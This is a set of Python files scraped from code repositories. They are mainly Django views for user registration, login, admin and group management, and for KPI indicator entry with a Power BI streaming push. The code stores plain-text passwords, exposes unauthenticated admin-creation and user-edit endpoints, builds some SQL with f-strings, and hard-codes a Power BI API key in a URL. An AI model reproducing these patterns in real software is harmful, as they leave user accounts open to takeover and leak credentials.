        # Webhook mode: run as an aiohttp server behind the configured path.
        print(
            f"Called with {argv}, running as aiohttp server after setting webhook."
        )
        from aiogram.utils import executor
        executor.start_webhook(
            dispatcher=dp,
            webhook_path=config['webhook_path'],
            skip_updates=True,
            on_startup=on_startup,
            host=config["app_host"],
            port=config["app_port"],
        )
    else:
        # Default: long-polling worker.
        print(f"Called with {argv}, running as long-polling worker.")
        asyncio.run(start_worker())
| why-not-try-calmer/O-Susie | bot.py | bot.py | py | 3,758 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "init.bot.delete_webhook",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "init.bot",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "init.bot.set_webhook",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "init.bot",
... |
71372300515 | import base64
import datetime
import json
import re
import time
from django.db import connection
from django.db.models import Q
from django.views.decorators.csrf import csrf_exempt
from operation.models import AdminLoginLog
from src.models import OneSrc
from user.models import User, Group
from utils.gen_captcha import create_img
from utils.manage_resp import resp
from utils.manage_token import get_data_obj, create_token, check_token
from utils.redis_helper import RD
from utils.send_email import send_mail
from utils.tools import img_code_overdue_decode, img_code_overdue_create
# ======================= User =======================
@csrf_exempt
def register(request):
    """Create a new front-end user account (POST only).

    Rejects duplicate login names / e-mails and passwords outside 6-16 chars.
    """
    if request.method == 'POST':
        login_name = request.POST.get('login_name')
        if User.objects.filter(login_name=login_name).first():
            return resp(1001, '用户名已存在')
        email = request.POST.get('email')
        if User.objects.filter(email=email).first():
            return resp(1001, '邮箱已注册')
        pwd = request.POST.get('pwd')
        if not 6 <= len(pwd) <= 16:
            return resp(1002, '密码长度在6-16')
        u = User()
        u.login_name = login_name
        u.pwd = pwd
        u.email = email
        u.major = request.POST.get('major')
        u.user_name = request.POST.get('user_name')
        u.qq = request.POST.get('qq')
        u.phone = request.POST.get('phone')
        u.save()
        return resp()
@csrf_exempt
def login(request):
    """Log a user in (front end) or an admin (back office, ``back`` flag).

    Flow: captcha validation -> credential check -> (admin only) login-log
    entry -> update login IP/time/counter -> issue a 24 h token.
    """
    if request.method == 'POST':
        # stus = Student.objects.filter(Q(s_age__lte=18) | Q(s_age__gt=20))  # OR-query example
        login_name = request.POST.get('login_name')
        # Browser fingerprint: used to verify user uniqueness and to limit
        # concurrent logins on the same account.
        fp = request.META.get('HTTP_AUTHENTICATION_FP')
        img_token = request.POST.get('img_token')
        try:
            code = int(request.POST.get('code'))
        except:
            # NOTE(review): bare except also catches SystemExit/KeyboardInterrupt.
            return resp(1003, '验证码不规范')
        pwd = request.POST.get('pwd')
        if not img_token:
            return resp(1004, '没有传入验证码序列号')
        token_flag = img_code_overdue_decode(img_token)
        if not token_flag:
            return resp(1001, '验证码过期')
        if code != token_flag['val']:
            return resp(code=1002, msg='验证码错误')
        # Back-office login flag.
        back = request.POST.get('back')
        u = User.objects.filter(
            Q(login_name=login_name) | Q(email=login_name)).first() if not back else User.objects.filter(
            login_name=login_name).filter(is_admin=1).first()
        if not u:
            return resp(201, '当前用户未注册')
        if not back:
            if u.is_admin:
                return resp(203, '管理员不能登陆前端')
        # NOTE(review): passwords are stored and compared in plain text.
        if u.pwd != pwd:
            return resp(202, '密码错误!')
        # Admin ==========
        # All checks passed: the caller is authenticated.
        # Admin logins are additionally recorded in the login log.
        if back:
            a_l = AdminLoginLog()
            a_l.login_ip = request.META.get('HTTP_X_FORWARDED_FOR')
            a_l.admin_name = u.login_name
            a_l.save()
        # User ==========
        # Admins are exempt from the concurrent-session limit (enable=-1);
        # ordinary users are throttled.
        # 1. Check whether this id is already active.
        # RD.save_uset_name(u.id, fp)  # store the fingerprint for session control
        # Update login bookkeeping.
        ori_op = request.META.get('HTTP_X_FORWARDED_FOR')
        if u.cur_login_ip:
            # Move the previous "current" ip/time into the "last" fields.
            u.last_login_ip = u.cur_login_ip
            u.last_login_time = u.cur_login_time
        u.cur_login_ip = ori_op if ori_op else request.META.get('REMOTE_ADDR')
        u.cur_login_time = datetime.datetime.now()
        if u.login_count:
            u.login_count += 1
        else:
            u.login_count = 1
        u.save()
        # Issue the user token (24 h expiry).
        obj = get_data_obj(id=u.id, expire=24 * 60 * 60)
        token = create_token(obj)
        return resp(data={'token': token, 'login_name': u.login_name})
@csrf_exempt
def forget_email_pwd(request):
    """Send a password-reset e-mail to the registered address (POST only)."""
    if request.method == 'POST':
        u = User.objects.filter(email=request.POST.get('email')).first()
        if not u:
            return resp(201, '用户不存在')
        # One-time token carrying the user id + creation time, valid 30 min.
        sequence = img_code_overdue_create(id=u.id, _time=time.time(), ex=30 * 60)
        if not u.email:
            return resp(401, '用户未填写邮箱')
        if not send_mail(u.email, sequence):
            return resp(402, '发送失败')
        return resp()
@csrf_exempt
def update_forget_email_pwd(request):
    """Set a new password using the one-time sequence from the reset e-mail.

    POST params: ``sequence`` (token from the e-mail link), ``pwd`` (new
    password). Returns 401 when the token is expired, invalid, or the user
    it references no longer exists.
    """
    if request.method == 'POST':
        # Unique identification string from the e-mail link.
        sequence = request.POST.get('sequence')
        pwd = request.POST.get('pwd')
        # Decode the string; any decode failure means an invalid token.
        try:
            obj = img_code_overdue_decode(sequence)
        except Exception:  # fixed: bare `except:` also swallowed SystemExit/KeyboardInterrupt
            obj = ''
        if not obj:
            return resp(401, '失效')
        u = User.objects.filter(id=obj['id']).first()
        if not u:  # fixed: previously crashed with AttributeError if the user was deleted
            return resp(401, '失效')
        u.pwd = pwd
        u.save()
        return resp()
def captcha(request):
    """Generate an image captcha; return it base64-encoded with its token."""
    if request.method == 'GET':
        img, token = create_img(time.time())
        encoded = str(base64.b64encode(img), encoding='utf-8')
        return resp(data={'img': encoded, 'token': token})
def check_img_code(request):
    """Validate a captcha answer: token must decode and value must match."""
    if request.method == 'GET':
        token = request.GET.get('token')
        val = int(request.GET.get('val'))
        obj = img_code_overdue_decode(token)
        # Step 1: was the token issued recently enough (not expired)?
        if not obj:
            return resp(code=1001, msg='token过期')
        # Step 2: does the submitted value match the generated one?
        if val != obj['val']:
            return resp(code=1002, msg='验证码错误')
        return resp()
def get_token_info(request):
    """Resolve the request token into user data.

    Returns the back-office dict when ``back`` is passed, otherwise the
    front-end dict; 4001 when the token is invalid.
    """
    if request.method == 'GET':
        obj = check_token(request.META.get('HTTP_AUTHENTICATION'))
        if not obj:
            return resp(code=4001, msg='token 失效')
        u = User.objects.filter(id=obj['id']).first()
        back = request.GET.get('back')
        return resp(data=u.to_back_dict() if back else u.to_front_dict())
def check_token_result(request):
    """Return 200 when the request token is still valid, 400 otherwise."""
    if request.method == 'GET':
        obj = check_token(request.META.get('HTTP_AUTHENTICATION'))
        return resp(200) if obj else resp(400)
@csrf_exempt
def update(request):
    """Back office: edit a user record (POST only).

    Overwrites every editable field from the POST payload and returns the
    refreshed back-office dict.
    """
    if request.method == 'POST':
        u = User.objects.filter(id=request.POST.get("id")).first()
        # fixed: previously crashed with AttributeError for an unknown id;
        # guard mirrors update_profile's `resp(201, 'not user')`.
        if not u:
            return resp(201, 'not user')
        u.group_id = request.POST.get('group_id')
        u.login_name = request.POST.get('login_name')
        u.pwd = request.POST.get('pwd')
        u.email = request.POST.get('email')
        u.major = request.POST.get('major')
        u.user_name = request.POST.get('user_name')
        u.qq = request.POST.get('qq')
        u.phone = request.POST.get('phone')
        u.end_time = request.POST.get('end_time')
        u.enable = int(request.POST.get('enable'))
        u.active = int(json.loads(request.POST.get('active')))
        u.save()
        return resp(data=u.to_back_read_dict())
def format_user_list(data):
    """Map one raw SQL row (see ``get_users`` / ``get_user``) to a dict.

    ``data`` is (id, login_name, user_name, group_name, add_time, end_time,
    last_login_ip, cur_login_ip); ``end_time`` may be None (expired).
    """
    uid, login_name, user_name, group_name, added, ended, last_ip, cur_ip = data
    return {
        'id': uid,
        'login_name': login_name,
        'user_name': user_name,
        'group_name': group_name,
        # A "total recharge amount" field is still to be added here.
        'add_time': added.strftime("%Y-%m-%d %H:%M:%S"),
        'end_time': ended.strftime("%Y-%m-%d %H:%M:%S") if ended else '已过期',
        'last_login_ip': last_ip,
        'cur_login_ip': cur_ip,
    }
def get_users(request):
    """Back office: fetch one user by ``id`` or a page of users.

    GET params: ``id`` (optional, single record), ``p`` (page, default 1),
    ``n`` (page size, default 10).
    """
    if request.method == "GET":
        u_id = request.GET.get('id')
        if u_id:
            # Single record.
            u = User.objects.filter(id=u_id).first()
            if not u:
                return resp(400, '没有该用户')
            return resp(data=u.to_back_read_dict())
        # Paged list via raw SQL (joins the group name in one query).
        cursor = connection.cursor()
        page = int(request.GET.get('p', 1))
        page_num = int(request.GET.get('n', 10))
        sql = ('select a.id,a.login_name,a.user_name,b.name,a.add_time,a.end_time,'
               'a.last_login_ip,a.cur_login_ip'
               ' from user a join `group` b on a.group_id=b.id limit %s,%s')
        # fixed: LIMIT values are now bound parameters instead of f-string splices.
        cursor.execute(sql, [(page - 1) * page_num, page_num])
        rows = cursor.fetchall()  # fixed: fetchall() was called AFTER cursor.close()
        cursor.close()
        return resp(data=[format_user_list(i) for i in rows])
def get_user(request):
    """Paged user list with optional filters and a total row count.

    GET params: ``p``/``n`` for paging; optional ``group_id`` (exact) and
    ``login_name`` / ``user_name`` / ``email`` (substring) filters.
    """
    if request.method == 'GET':
        cursor = connection.cursor()
        d = request.GET
        p = int(d.get('p', 1))
        n = int(d.get('n', 10))
        base = ('select a.id,a.login_name,a.user_name,b.name,a.add_time,a.end_time,'
                'a.last_login_ip,a.cur_login_ip'
                ' from user a join `group` b on a.group_id=b.id')
        # fixed: filter values were spliced straight into the SQL string
        # (injection risk); they are now bound parameters. The old
        # `len(tmp_d) > 2` gate (which assumed p/n always present) is replaced
        # by "any non-empty filter present".
        where_parts, params = [], []
        for key in d:
            if key in ('p', 'n') or not d[key]:
                continue
            if key == 'group_id':
                where_parts.append('a.group_id=%s')
                params.append(d[key])
            elif key in ('login_name', 'user_name', 'email'):
                where_parts.append(f'a.{key} like %s')
                params.append(f'%{d[key]}%')
        where_sql = (' where ' + ' and '.join(where_parts)) if where_parts else ''
        sql = base + where_sql + ' order by a.id desc limit %s,%s'
        cursor.execute(sql, params + [(p - 1) * n, n])
        data = [format_user_list(i) for i in cursor.fetchall()]
        # Same filters, count only (replaces the old regex rewrite of the SELECT list).
        count_sql = ('select count(*) from user a join `group` b on a.group_id=b.id'
                     + where_sql)
        cursor.execute(count_sql, params)
        total = cursor.fetchone()[0]
        cursor.close()
        return resp(data=data, count=total)
def get_user_count(request):
    """Total number of user rows."""
    if request.method == 'GET':
        return resp(count=User.objects.count())
@csrf_exempt
def update_profile(request):
    """Let the token's user edit their own profile fields (POST only)."""
    if request.method == 'POST':
        obj = check_token(request.META.get('HTTP_AUTHENTICATION'))
        u = User.objects.filter(id=obj['id']).first()
        if not u:
            return resp(201, 'not user')
        for field in ('email', 'major', 'user_name', 'qq', 'phone'):
            setattr(u, field, request.POST.get(field))
        u.save()
        return resp()
@csrf_exempt
def update_pwd(request):
    """Change the token user's password after verifying the old one."""
    if request.method == 'POST':
        obj = check_token(request.META.get('HTTP_AUTHENTICATION'))
        u = User.objects.filter(id=obj['id']).first()
        if not u:
            return resp(201, 'not user')
        if u.pwd != request.POST.get('old_pwd'):
            return resp(202, 'pwd error')
        u.pwd = request.POST.get('new_pwd')
        u.save()
        return resp()
def get_user_info(request):
    """Return user info by ``id`` (or all users) for an authenticated caller.

    Admin callers receive the back-office payload, ordinary callers the
    front-end payload.
    NOTE(review): reads the token from ``HTTP_AUTH_TOKEN`` while the sibling
    views use ``HTTP_AUTHENTICATION`` — confirm which header the client sends.
    """
    if request.method == "GET":
        u_id = request.GET.get('id')
        # Decide which payload shape to return: the token's owner determines
        # whether back-office or front-end data is appropriate.
        token = request.META.get('HTTP_AUTH_TOKEN')
        obj = check_token(token)
        if obj:
            # Token passed validation.
            check_u = User.objects.filter(id=obj['id']).first()
            if u_id:
                u = User.objects.filter(id=u_id).first()
                return resp(data=u.to_back_dict() if check_u.is_admin else u.to_front_dict())
            else:
                u_all = User.objects.all()
                return resp(data=[i.to_back_dict() for i in u_all])
        else:
            return resp(code=400, msg='处于没有登陆状态')
@csrf_exempt
def add_back_user(request):
    """Back office: create a user with the full field set (group, expiry, flags)."""
    if request.method == 'POST':
        login_name = request.POST.get('login_name')
        if User.objects.filter(login_name=login_name).first():
            return resp(1001, '用户名已存在')
        email = request.POST.get('email')
        if User.objects.filter(email=email).first():
            return resp(1001, '邮箱已注册')
        pwd = request.POST.get('pwd')
        if not 6 <= len(pwd) <= 16:
            return resp(1002, '密码长度在6-16')
        # Remaining optional / administrative fields.
        u = User()
        u.login_name = login_name
        u.email = email
        u.pwd = pwd
        u.group_id = request.POST.get('group_id')
        u.major = request.POST.get('major')
        u.qq = request.POST.get('qq')
        u.user_name = request.POST.get('user_name')
        u.phone = request.POST.get('phone')
        u.end_time = request.POST.get('end_time')
        u.enable = int(request.POST.get('enable'))
        u.active = int(json.loads(request.POST.get('active')))
        u.save()
        return resp()
def query_user(request):
    """Dynamic AND-filtered user search.

    ``group_id`` matches exactly; every other supplied key is a substring
    (``__contains``) match.
    """
    if request.method == 'GET':
        q = Q()
        for key, value in request.GET.items():
            if value:
                lookup = key if key == 'group_id' else f'{key}__contains'
                q.add(Q(**{lookup: value}), Q.AND)
        users = User.objects.filter(q)
        return resp(data=[u.to_back_read_dict() for u in users])
# ===================== Admins ====================
@csrf_exempt
def add_admin(request):
    """Create an administrator account (``is_admin=1``)."""
    if request.method == 'POST':
        admin = User()
        admin.login_name = request.POST.get('login_name')
        admin.user_name = request.POST.get('username')
        admin.pwd = request.POST.get('pwd')
        admin.is_admin = 1
        admin.save()
        return resp()
def get_admins(request):
    """Fetch one admin by ``id`` or list all admin accounts."""
    if request.method == 'GET':
        a_id = request.GET.get('id')
        if a_id:
            admin = User.objects.filter(id=a_id).filter(is_admin=1).first()
            return resp(data=admin.to_admin_view_dict())
        admins = User.objects.filter(is_admin=1)
        return resp(data=[a.to_admin_dict() for a in admins])
@csrf_exempt
def update_admin(request):
    """Edit an administrator's login name, display name and password."""
    if request.method == 'POST':
        admin = User.objects.filter(id=request.POST.get('id')).first()
        admin.login_name = request.POST.get('login_name')
        admin.user_name = request.POST.get('username')
        admin.pwd = request.POST.get('pwd')
        admin.save()
        return resp()
def query_admin(request):
    """Dynamic AND-filtered substring search over admin accounts."""
    if request.method == 'GET':
        q = Q()
        for key, value in request.GET.items():
            if value:
                q.add(Q(**{f'{key}__contains': value}), Q.AND)
        admins = User.objects.filter(q).filter(is_admin=1)
        return resp(data=[a.to_admin_dict() for a in admins])
# ==================== Group ===================
@csrf_exempt
def add_group(request):
    """Create a membership group."""
    if request.method == 'POST':
        g = Group()
        g.name = request.POST.get('name')
        g.desc = request.POST.get('desc')
        g.save()
        return resp()
def del_group(request):
    """Delete a group by id."""
    if request.method == 'GET':
        Group.objects.filter(id=request.GET.get('id')).delete()
        return resp()
@csrf_exempt
def update_group(request):
    """Edit a group's name and description."""
    if request.method == 'POST':
        g = Group.objects.filter(id=request.POST.get('id')).first()
        g.name = request.POST.get('name')
        g.desc = request.POST.get('desc')
        g.save()
        return resp()
def get_group_info(request):
    """Return one group (full dict) by ``id``, or all groups (name dicts)."""
    if request.method == 'GET':
        g_id = request.GET.get('id')
        if g_id:
            # Single record.
            g = Group.objects.filter(id=g_id).first()
            return resp(data=g.to_full_dict())
        # All records.
        return resp(data=[g.to_name_dict() for g in Group.objects.all()])
def to_group_one_src(request):
    """Page through every resource visible to one membership group."""
    if request.method == 'GET':
        p = int(request.GET.get('p', 1))
        n = int(request.GET.get('n', 10))
        g = Group.objects.filter(id=request.GET.get('id')).first()
        # Each related object yields a list; flatten them before paging.
        nested = [i.to_two_group_dict() for i in g.go.all()]
        flat = [item for sub in nested for item in sub]
        return resp(data=flat[(p - 1) * n:p * n], count=len(flat))
def get_to_name_info(request):
    """List groups, optionally filtered by a name substring."""
    if request.method == 'GET':
        name = request.GET.get('name')
        qs = Group.objects.filter(name__contains=name) if name else Group.objects.all()
        return resp(data=[g.to_name_dict() for g in qs])
def check_user(request):
    """Validate the caller's token and subscription, then return the
    top-level resource categories their group may access.

    NOTE(review): ``group`` is fetched but never used; the second raw SQL
    builds ``in (...)`` from ``one_src_id_list`` and is malformed SQL when
    that list is empty — confirm upstream guarantees at least one grant.
    """
    if request.method == 'GET':
        token = request.META.get('HTTP_AUTHENTICATION')
        obj = check_token(token)
        if not obj:
            return resp(204, '用户信息过期')
        u_id = obj['id']
        u = User.objects.filter(id=u_id).first()
        end_time = u.end_time
        if not end_time:
            return resp(201, '用户还未购买资源')
        # Has the user's subscription expired?
        if datetime.datetime.now() > end_time:
            # Subscription expired.
            return resp(202, '用户过期')
        # Look up the resource permissions of this user's group.
        group = Group.objects.filter(id=u.group_id).first()
        # Collect the top-level category ids granted to the user's group.
        cursor = connection.cursor()
        sql = f'select a.id from one_src a join one_src_group b on a.id=b.one_src_id join `group` c on ' \
              f'c.id=b.group_id join user d on d.group_id=c.id where d.id={u_id}'
        cursor.execute(sql)
        one_src_id_list = [str(i[0]) for i in cursor.fetchall()]
        sql = f'select a.id from one_src a left join two_src b on a.id=b.one_src_id left join three_src c ' \
              f'on b.id=c.two_src_id where a.id in ({",".join(one_src_id_list)});'
        cursor.execute(sql)
        data = OneSrc.objects.filter(id__in=[i for i in {i[0] for i in cursor.fetchall()}])
        cursor.close()
        data = [i.to_all_dict() for i in data]
        return resp(data=data)
| 17-12-20-ll/fun_lib | user/views.py | views.py | py | 20,640 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "user.models.User.objects.filter",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "user.models.User.objects",
"line_number": 28,
"usage_type": "attribute"
},
{
"api_name": "user.models.User",
"line_number": 28,
"usage_type": "name"
},
{
"ap... |
22052722472 | from django.shortcuts import render, redirect
from django.http import HttpResponse, HttpResponseRedirect
from django.urls import reverse_lazy
from django.views.generic import CreateView
from django.contrib.auth.models import User
from .models import *
from .forms import *
# from .api_powerbi import *
from django.http import JsonResponse
import numpy as np
import xlrd
import os
# Create your views here.
class Crear_Usuario(CreateView):  # create user
    """CreateView that handles two forms at once: the Usuario profile
    (``form``) and the underlying auth ``User`` (``form2``)."""
    model = Usuario
    template_name = 'base/Usuario.html'
    form_class = UsuarioForm
    second_form_class = UserForm
    success_url = reverse_lazy('Streaming')
    def get_context_data(self,**kwargs):
        # Inject both unbound forms into the template context on GET.
        context = super(Crear_Usuario, self).get_context_data(**kwargs)
        if 'form' not in context:
            context['form'] = self.form_class(self.request.GET)
        if 'form2' not in context:
            context['form2'] = self.second_form_class(self.request.GET)
        return context
    def post(self, request, *args, **kwargs):
        # NOTE(review): this assigns the bound method, not its result
        # (missing parentheses) — confirm whether self.get_object() was meant.
        self.object = self.get_object
        form = self.form_class(request.POST)
        form2 = self.second_form_class(request.POST)
        if form.is_valid() and form2.is_valid():
            # Save the auth user first, then link it to the profile.
            usuario = form.save(commit =False)
            usuario.user = form2.save()
            usuario.save()
            return HttpResponseRedirect(self.get_success_url())
        else:
            return render(request,'base/Usuario_Error.html')
def api_bi(request):
    """Push randomly generated KPI rows to a Power BI streaming dataset.

    NOTE(review): the ``while True`` loop never returns an HttpResponse, so
    the request worker running this view is blocked permanently — confirm
    it is only ever triggered as a background job.
    NOTE(review): the push URL embeds an API key in source code; move it to
    settings/environment configuration.
    """
    import pandas as pd
    from datetime import datetime
    from datetime import timedelta
    import requests
    import time
    import random
    ## helper for data generation
    def data_generation():
        # One synthetic row of financial KPIs plus an ISO timestamp.
        FACTURACION = random.randint(10,20)
        RECAUDO = random.randint(10,20)
        COSTOS =random.randint(5, 30)
        GASTOS = random.randint(20, 100)
        INGRESOS = random.randint(50, 500)
        NOMINA = random.randint(10, 20)
        COSTO_MEDICAMENTOS = random.randint(2, 10)
        FECHA = datetime.now().isoformat()
        return [FACTURACION,
        RECAUDO,
        COSTOS,
        GASTOS,
        INGRESOS,
        NOMINA,
        COSTO_MEDICAMENTOS,
        FECHA
        ]
    # if __name__ == '__main__':
    REST_API_URL = 'https://api.powerbi.com/beta/a944c466-734b-4bd4-8cd8-c77d529a3150/datasets/87c5fec3-469e-4369-b5fd-136db20487e9/rows?tenant=a944c466-734b-4bd4-8cd8-c77d529a3150&UPN=ceo%40wetechin.org&key=kYjxgjRj77d7rvPRGI%2Byb0z7cfG6r91ey5Lj90bD4sO1WizwNf0z79lhENFFqGpLo2L0u8%2BW4ZkkpadXa3g%2FdQ%3D%3D'
    #'https://api.powerbi.com/beta/a944c466-734b-4bd4-8cd8-c77d529a3150/datasets/a61197ae-f34a-454f-9c35-dc30e8c515d3/rows?redirectedFromSignup=1&key=bRPsa8kIiVBgdFCrhc8Bn1fZZf2o65H0oWv0AbvFOhYkvevcRWT67yvPcxJmaABDYHuuE9YJzgDGTLuFvZxOmQ%3D%3D'
    # 'https://api.powerbi.com/beta/e81af6ba-a66f-4cab-90f9-9225862c5cf8/datasets/51a56115-ac32-437a-8f2c-3ed1fa1dc37a/rows?key=24THP%2FqLUg2EWnDtFiTUr8GTjjPOU%2FxjT%2BnkTt9%2FHMlkMG%2B5BhWe0pYVfsJcE8gVNitZ3C2Fp1akv3LR7hLVNQ%3D%3D'
    while True:
        data_raw = []
        for i in range(1):
            row = data_generation()
            data_raw.append(row)
        print("Raw data - ", data_raw)
        # set the header record
        HEADER = ["FACTURACION", "RECAUDO", "COSTOS","GASTOS", "INGRESOS", "NOMINA", "COSTO_MEDICAMENTOS", "FECHA"]
        data_df = pd.DataFrame(data_raw, columns=HEADER)
        data_json = bytes(data_df.to_json(orient='records'), encoding='utf-8')
        print("JSON dataset", data_json)
        # Post the data on the Power BI API
        req = requests.post(REST_API_URL, data_json)
        print("Data posted in Power BI API")
        time.sleep(2)
# Home page view
def index(request):
    """Home page: completion percentage of indicators per sub-group."""
    sub_grupos = Sub_grupo.objects.all()
    # One [percentage, None] row per sub-group.
    lista_sub_grup = [[None, None] for _ in range(sub_grupos.count())]
    for pos, sg in enumerate(sub_grupos):
        total = Indicador.objects.filter(sub_grupo=sg.id).count() + 10
        diligenciados = 2
        lista_sub_grup[pos][0] = round((diligenciados / total) * 100, 1)
    print(lista_sub_grup)
    return render(request, 'base/index.html', {'lista': lista_sub_grup})
def Streaming(request,*args, **kwargs):
    """Render the live (streaming) dashboard page."""
    return render(request, 'indicadores/Streaming.html')
def Dashboard(request,*args, **kwargs):
    """Render the static dashboard page."""
    return render(request, 'indicadores/Dashboard.html')
# Site theme pages
def tema_1(request,*args, **kwargs):
    """Theme: blue."""
    return render(request, 'base/TemaBlue/tema_1.html')
def tema_2(request,*args, **kwargs):
    """Theme: white."""
    return render(request, 'base/TemaWhite/tema_white_1.html')
def tema_3(request,*args, **kwargs):
    """Theme: full white."""
    return render(request, 'base/TemaWhiteTotal/tema_3.html')
def tema_4(request,*args, **kwargs):
    """Theme: white/blue."""
    return render(request, 'base/TemaWhiteBlue/tema_4.html')
# end of theme pages ********************
# ==== Tipo_reporte (report type) views ====
def Tipo_reporteList(request):
    """List all report types.

    fixed: removed leftover debug code (commented-out xlrd spreadsheet
    import and a stray ``np.random.random()`` + print).
    """
    tiporeporte = Tipo_reporte.objects.all()
    contexto = {'tiporeportes': tiporeporte}
    return render(request, 'indicadores/tiporeporte_list.html', contexto)
def Tipo_reporteCrear(request):
    """Create a report type; blank form on GET, save on valid POST."""
    if request.method == 'POST':
        form = Tipo_reporteForm(request.POST)
        if form.is_valid():
            form.save()
            return redirect('Tipo_reporte_list')
    else:
        # Only GET and POST are supported.
        form = Tipo_reporteForm()
    return render(request, 'indicadores/tiporeporte_form.html', {'form': form})
def Tipo_reporteEdit(request, id_):
    """Edit an existing report type."""
    instancia = Tipo_reporte.objects.get(id=id_)
    if request.method == 'GET':
        form = Tipo_reporteForm(instance=instancia)
    else:
        form = Tipo_reporteForm(request.POST, instance=instancia)
        if form.is_valid():
            form.save()
            return redirect('Tipo_reporte_list')
    return render(request, 'indicadores/tiporeporte_form.html', {'form': form})
def Tipo_reporteElim(request, id_):
    """Delete a report type and return to the list."""
    Tipo_reporte.objects.get(id=id_).delete()
    return redirect('Tipo_reporte_list')
# ==== end Tipo_reporte views ====
# ==== Grupo_general views ====
def Grupo_generalList(request):
    """List all general groups."""
    grupos = Grupo_general.objects.all()
    return render(request, 'indicadores/Grupo_general_list.html',
                  {'Grupo_generals': grupos})
def Grupo_generalCrear(request):
    """Create a general group; blank form on GET, save on valid POST."""
    if request.method == 'POST':
        form = Grupo_generalForm(request.POST)
        if form.is_valid():
            form.save()
            return redirect('Grupo_general_list')
    else:
        form = Grupo_generalForm()
    return render(request, 'indicadores/Grupo_general_form.html', {'form': form})
def Grupo_generalEdit(request, id_):
    """Edit an existing general group identified by ``id_``."""
    instancia = Grupo_general.objects.get(id=id_)
    if request.method == 'GET':
        form = Grupo_generalForm(instance=instancia)
    else:
        form = Grupo_generalForm(request.POST, instance=instancia)
        if form.is_valid():
            form.save()
            return redirect('Grupo_general_list')
    return render(request, 'indicadores/Grupo_general_form.html', {'form': form})
def Grupo_generalElim(request, id_):
    """Delete a general group and return to the list."""
    Grupo_general.objects.get(id=id_).delete()
    return redirect('Grupo_general_list')
# ==== Sub_grupo views ====
def Sub_grupoList(request):
    """List all sub-groups."""
    subgrupos = Sub_grupo.objects.all()
    return render(request, 'indicadores/Sub_grupo_list.html',
                  {'Sub_grupos': subgrupos})
def Sub_grupoCrear(request):
    """Create a sub-group; blank form on GET, save on valid POST."""
    if request.method == 'POST':
        form = Sub_grupoForm(request.POST)
        if form.is_valid():
            form.save()
            return redirect('Sub_grupo_list')
    else:
        form = Sub_grupoForm()
    return render(request, 'indicadores/Sub_grupo_form.html', {'form': form})
def Sub_grupoEdit(request, id_):
    """Edit an existing sub-group identified by ``id_``."""
    instancia = Sub_grupo.objects.get(id=id_)
    if request.method == 'GET':
        form = Sub_grupoForm(instance=instancia)
    else:
        form = Sub_grupoForm(request.POST, instance=instancia)
        if form.is_valid():
            form.save()
            return redirect('Sub_grupo_list')
    return render(request, 'indicadores/Sub_grupo_form.html', {'form': form})
def Sub_grupoElim(request, id_):
    """Delete a sub-group and return to the list."""
    Sub_grupo.objects.get(id=id_).delete()
    return redirect('Sub_grupo_list')
# ==== Indicador views ====
def IndicadorList(request):
    """List all indicators."""
    indicadores = Indicador.objects.all()
    return render(request, 'indicadores/Indicador_list.html',
                  {'Indicadors': indicadores})
def IndicadorCrear(request):
    """Create an indicator; blank form on GET, save on valid POST."""
    if request.method == 'POST':
        form = IndicadorForm(request.POST)
        if form.is_valid():
            form.save()
            return redirect('Indicador_list')
    else:
        form = IndicadorForm()
    return render(request, 'indicadores/Indicador_form.html', {'form': form})
def IndicadorEdit(request, id_):
    """Edit an existing indicator identified by ``id_``."""
    instancia = Indicador.objects.get(id=id_)
    if request.method == 'GET':
        form = IndicadorForm(instance=instancia)
    else:
        form = IndicadorForm(request.POST, instance=instancia)
        if form.is_valid():
            form.save()
            return redirect('Indicador_list')
    return render(request, 'indicadores/Indicador_form.html', {'form': form})
def IndicadorElim(request, id_):
    """Delete an indicator and return to the list."""
    Indicador.objects.get(id=id_).delete()
    return redirect('Indicador_list')
# ==== Lenar_Indicador (indicator data entry) views ====
def _actualizar_resultado(registro):
    """Recompute and save ``resultado`` = numerador/denominador * factor (2 dp).

    fixed: extracted from four copies of the same expression; guards against
    a zero/empty denominator, which previously raised ZeroDivisionError and
    returned a 500 to the client (resultado is left unchanged in that case).
    """
    if not registro.valor_denominador:
        return
    registro.resultado = round(
        (registro.valor_numerador / registro.valor_denominador)
        * registro.indicador.factor, 2)
    registro.save()
def Lenar_IndicadorList(request):
    """List every recorded indicator value."""
    registros = Lenar_Indicador.objects.all()
    return render(request, 'indicadores/Lenar_Indicador_list.html',
                  {'Lenar_Indicadors': registros})
def Lenar_IndicadorCrear(request):
    """Record a new indicator value.

    On GET the newest row's ``resultado`` is recomputed before rendering, as
    in the original flow.
    """
    registros = Lenar_Indicador.objects.all()
    if request.method == 'POST':
        form = Lenar_IndicadorForm(request.POST)
        if form.is_valid():
            form.save()
            print(form)
            return redirect('Lenar_Indicador_crear')
    else:
        form = Lenar_IndicadorForm()
        if registros.count() != 0:
            _actualizar_resultado(registros.last())
    return render(request, 'indicadores/Lenar_Indicador_form.html',
                  {'form': form, 'Lenar_Indicadors': registros})
def Lenar_IndicadorEdit(request, id_):
    """Edit a recorded value, recompute its result, return to the list."""
    registro = Lenar_Indicador.objects.get(id=id_)
    if request.method == 'GET':
        form = Lenar_IndicadorForm(instance=registro)
    else:
        form = Lenar_IndicadorForm(request.POST, instance=registro)
        if form.is_valid():
            form.save()
            _actualizar_resultado(Lenar_Indicador.objects.get(id=id_))
            return redirect('Lenar_Indicador_list')
    return render(request, 'indicadores/Lenar_Indicador_form.html', {'form': form})
# Variant used from inside the entry form (redirects back to the form).
def Lenar_IndicadorEdit_Form(request, id_):
    """Edit a recorded value from the entry-form page itself."""
    registro = Lenar_Indicador.objects.get(id=id_)
    if request.method == 'GET':
        form = Lenar_IndicadorForm(instance=registro)
    else:
        form = Lenar_IndicadorForm(request.POST, instance=registro)
        if form.is_valid():
            form.save()
            _actualizar_resultado(Lenar_Indicador.objects.get(id=id_))
            return redirect('Lenar_Indicador_crear')
    return render(request, 'indicadores/Lenar_Indicador_form_2.html', {'form': form})
# Variant without front-end effects, which made numerator/denominator
# values disappear while editing.
def Lenar_IndicadorEdit_Sin_Efecto(request, id_):
    """Edit a recorded value using the effect-free template."""
    registro = Lenar_Indicador.objects.get(id=id_)
    if request.method == 'GET':
        form = Lenar_IndicadorForm(instance=registro)
    else:
